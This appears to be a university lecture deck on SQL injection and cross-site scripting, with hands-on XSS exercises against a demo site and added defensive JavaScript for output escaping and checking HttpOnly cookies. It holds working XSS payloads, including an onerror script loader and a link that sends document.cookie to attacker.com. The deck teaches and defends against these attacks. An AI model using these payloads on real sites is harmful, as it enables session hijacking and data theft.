Agenda - Boise State CS (cs.boisestate.edu/~jxiao/cs333/12-xss-attack.pdf)

Uploaded by phungminh, 06-Feb-2018

1/21

Agenda

- SQL injection review
- XSS attacks

2/21

Excerpt from the Debate - Closely relevant to this class

- "Mine were words, and his was action."
- "You would be in jail."
- "When they go low, we go high."
- "She doesn't do anything about anything other than talk. It's all talk, no action."

3/21

SQL Injection Review - the Arizona Voter Database Hack Incident

Read this news: http://www.azfamily.com/story/32945105/hack-that-targeted-arizona-voter-database-was-easy-to-prevent-expert-says

or watch the video: https://www.youtube.com/watch?v=05mHxMYbdj8

4/21

What can we learn from this news?

- SQL injection attacks are prevalent in the real world.
- SQL injection attacks are easy to perform.
- Limiting what users can type into an input field is a countermeasure against SQL injection attacks.
- Everyone, after taking this class, can be the director of strategic research initiatives at Arizona State University's Global Security Initiative.

5/21

The Illinois Voter Registration System (IVRS) Security Breach Incident

Read this: https://www.facebook.com/permalink.php?story_fbid=1144387868951159&id=215366205186668

Do you agree with this memo when it says "This was a highly sophisticated attack"?

6/21

SQL Injection Hall of Shame

Go here and see how popular SQL injection is in 2016: http://codecurmudgeon.com/wp/sql-injection-hall-of-shame/

7/21

Cross Site Scripting (XSS)

- A security bug that can affect websites.
- If present in your website, this bug can allow an attacker to add their own malicious JavaScript code onto the HTML pages displayed to your users.
- Once executed by the victim's browser, this code could then perform actions such as completely changing the behavior or appearance of the website, stealing private data, or performing actions on behalf of the user.

8/21

Prerequisites

- HTML
- JavaScript
- Document Object Model (DOM)
- A background in these will be helpful for understanding the technical details.

9/21

Types

- Non-persistent (reflected): Occurs when the data provided by a web client, most commonly in HTTP query parameters (e.g. an HTML form submission), is used immediately by server-side scripts to parse and display a page of results for and to that user, without properly sanitizing the request.
- Persistent (stored): Occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping.

10/21

Non-persistent

- e.g., a non-persistent XSS vulnerability in Google could allow malicious sites to attack Google users who visit them while logged in.

11/21

Persistent

- A dating website where members scan the profiles of other members to see if they look interesting. For privacy reasons, this site hides everybody's email. The only time a member's email is in the browser is when the member is signed in, and they can't see anyone else's.
- Mallory, an attacker, joins the site and wants to figure out the email addresses of the people on the site. To do so, she writes a script designed to run from other people's browsers when they visit her profile. The script then sends a quick message to her own server, which collects this information.

12/21

Persistent - Cont'd

- For the question "Describe your Ideal First Date", Mallory gives a short answer (to appear normal), but the text at the end of her answer is her script to steal names and emails. If the script is enclosed inside a <script> element, it won't be shown on the screen.
- Bob, a member of the dating site, reaches Mallory's profile, which has her answer to the First Date question. Her script is run automatically by the browser and steals a copy of Bob's email directly from his own machine.

13/21

Hands-on Project - Session 1.1 - Non-persistent XSS attack

- Go to https://xss-doc.appspot.com/demo/2.
- Search for test.
- Search for <u>test</u>. Notice that "test" is underlined in the response.
- You can see that your HTML markup is included in the response. Interesting, but not terribly dangerous.

14/21

Hands-on Project - Session 1.2 - Non-persistent XSS attack

- Search for <script>alert('hello')</script>.
- Note: if you copy-paste this into the input box, make sure you manually type in the single quotes.
- Problem?
  - User input is not escaped before the search results page is rendered.
  - This is a "reflected" XSS attack, where the JavaScript payload (<script>alert('hello')</script>) is echoed back on the page returned by the server to the victim right away.


15/21

Hands-on Project - Session 2.1

- Go to https://xss-doc.appspot.com/demo/1
- Enter <img src=x onerror="alert('Pop-up window via stored XSS');">
- Click "Share status". What do you see?
- Refresh the page or share another random status message (e.g., type "hello world!" in the message box and share status). What do you see?
- Now enter <img src=x onerror="alert(document.cookie);"> and hit "Share status!" What do you see?
- Imagine this vulnerability exists on www.facebook.com. By exploiting this vulnerability, what bad things can attackers do?

16/21

Hands-on Project - Session 2.2

- Try entering the following: <img src=1 onerror="s=document.createElement('script');s.src='//xss-doc.appspot.com/static/evil.js';document.body.appendChild(s);">
- In this example, an evil JavaScript file was retrieved and embedded via XSS.
- The server stores the attacker-supplied input (the XSS payload) and serves it to the victim at a later time. This is a "stored XSS" or persistent XSS attack.
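The two cases from the Types slide and from Sessions 1 and 2, as an added example that is not part of the slides or of the xss-doc demo site: a search echo (reflected) and a status board (stored), each rendered once by raw string concatenation and once through an HTML escaper, plus a small regression check a test suite can run over the rendered page. The function names, the in-memory `statusStore` that stands in for the demo site's database, and the sample inputs are all constructed here.

```javascript
// Added example (not from the slides or the xss-doc demo site).
// Two tiny page renderers: a search echo (the reflected case from Session 1)
// and a status board (the stored case from Session 2), each in a vulnerable
// form and a form that escapes untrusted input before it reaches the HTML.

// Escape the characters that can change HTML structure when user data is
// placed into element content or a quoted attribute value.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Reflected XSS: the query parameter is echoed straight into the response.
function renderSearchVulnerable(query) {
  return `<p>Results for: ${query}</p>`;
}

// Hardened form: the same page, with the query escaped on output.
function renderSearchSafe(query) {
  return `<p>Results for: ${escapeHtml(query)}</p>`;
}

// Stored XSS: status messages are kept server-side (an in-memory array
// stands in for the database) and rendered for every later visitor.
const statusStore = [];

// Returns the number of stored messages after the new one is saved.
function shareStatus(message) {
  statusStore.push(message);
  return statusStore.length;
}

function renderFeedVulnerable() {
  return '<ul>' + statusStore.map((m) => `<li>${m}</li>`).join('') + '</ul>';
}

function renderFeedSafe() {
  return '<ul>' + statusStore.map((m) => `<li>${escapeHtml(m)}</li>`).join('') + '</ul>';
}

// Regression check for a test suite: does the rendered page contain a
// <script> tag or an element carrying an on* event-handler attribute?
// It flags the vulnerable renderers above and stays quiet once output is
// escaped (escaped text has no '<' left in it), but it is a test aid only,
// not a substitute for escaping.
function containsActiveHtml(html) {
  return /<script\b|<[a-z][^>]*\son\w+\s*=/i.test(html);
}

// Constructed inputs, taken from the payloads used in the hands-on sessions.
const REFLECTED_PAYLOAD = "<script>alert('hello')</script>";
const STORED_PAYLOAD = '<img src=x onerror="alert(document.cookie);">';
```

Call `renderSearchVulnerable(REFLECTED_PAYLOAD)` and `renderSearchSafe(REFLECTED_PAYLOAD)` side by side to see the reflected case, then `shareStatus(STORED_PAYLOAD)` followed by the two feed renderers for the stored case; `containsActiveHtml` returns true only for the vulnerable renderings.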


17/21

References

A large portion of the material is adapted from:

- Cross site scripting Wikipedia page - https://en.wikipedia.org/wiki/Cross-site_scripting
- Google application security, cross-site scripting - https://www.google.com/about/appsecurity/learning/xss/
- HTTP cookie on Wikipedia - https://en.wikipedia.org/wiki/HTTP_cookie

18/21

Backup Slides

19/21

A Real World Story to Read

Serious Cross Site Scripting Vulnerability in TweetDeck – Twitter: https://blog.sucuri.net/2014/06/serious-cross-site-scripting-vulnerability-in-tweetdeck-twitter.html

Twitter shuts down Tweetdeck after XSS flaw leaves users vulnerable to account hijack: https://www.theguardian.com/technology/2014/jun/11/twitter-tweetdeck-xss-flaw-users-vulnerable

20/21

HTTP Cookie

- Also called web cookie, Internet cookie, browser cookie.
- A small piece of data sent from a website and stored in the user's web browser while the user is browsing.
- Typically used by web servers to know whether the user is logged in or not, and which account they are logged in with.
- Session cookie - held only in temporary memory while the user navigates the website. Web browsers normally delete session cookies when the user closes the browser.

21/21

Cookie Theft

- Cookies should only be exchanged between a server and a client.
- Cookie theft: when a cookie is sent to another party.
- e.g., an attacker may post a message on www.example.com with the following link: <a href="#" onclick="window.location = 'http://attacker.com/stole.cgi?text=' + escape(document.cookie); return false;">Click here!</a>
- See https://en.wikipedia.org/wiki/HTTP_cookie#Session_cookie for more details.
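The defender's counterpart to the link above, as an added example that is not from the slides: the stole.cgi request only carries what `document.cookie` exposes, and browsers leave cookies set with the HttpOnly attribute out of that string even though they are still sent on every request. The functions below parse constructed Set-Cookie headers (the cookie names and values are placeholders, not real tokens) and report which cookies such a payload could carry away.

```javascript
// Added example (not from the slides). Given the Set-Cookie headers a server
// sends, work out which cookies a script injected through XSS could read via
// document.cookie: those without the HttpOnly attribute. A session cookie
// marked HttpOnly is still sent with every request, but it is invisible to
// the onclick payload on this slide.

// Parse one Set-Cookie header value into its name, value and the attributes
// set on it. Attribute names are case-insensitive; HttpOnly and Secure carry
// no value.
function parseSetCookie(header) {
  const [nameValue, ...attrs] = header.split(';').map((part) => part.trim());
  const eq = nameValue.indexOf('=');
  const name = eq === -1 ? nameValue : nameValue.slice(0, eq);
  const value = eq === -1 ? '' : nameValue.slice(eq + 1);
  const flags = new Set(attrs.map((a) => a.split('=')[0].trim().toLowerCase()));
  return { name, value, httpOnly: flags.has('httponly'), secure: flags.has('secure') };
}

// Names of cookies that document.cookie would expose to page scripts.
function scriptReadableCookies(setCookieHeaders) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter((c) => !c.httpOnly)
    .map((c) => c.name);
}

// What the browser would place in document.cookie for these headers, i.e.
// exactly the string the stole.cgi request on the slide would carry.
function simulatedDocumentCookie(setCookieHeaders) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter((c) => !c.httpOnly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Audit helper: the session cookies (names supplied by the reviewer) that a
// cookie-theft payload could read are the ones that turn into account hijack.
function sessionCookiesMissingHttpOnly(setCookieHeaders, sessionCookieNames) {
  const readable = new Set(scriptReadableCookies(setCookieHeaders));
  return sessionCookieNames.filter((n) => readable.has(n));
}

// Constructed headers; the values are placeholders, not real tokens.
const SAMPLE_SET_COOKIE = [
  'sessionid=PLACEHOLDER_SESSION; Path=/; Secure; HttpOnly',
  'theme=dark; Path=/',
  'legacy_session=PLACEHOLDER_LEGACY; Path=/; Secure',
];
```

Run `sessionCookiesMissingHttpOnly(SAMPLE_SET_COOKIE, ['sessionid', 'legacy_session'])` against the headers a deployment actually sends; anything it returns is a session cookie that the link on this slide would exfiltrate. HttpOnly limits the damage of a cookie-theft payload but does not prevent the injected script from acting on the user's behalf within the page, so it complements output escaping rather than replacing it.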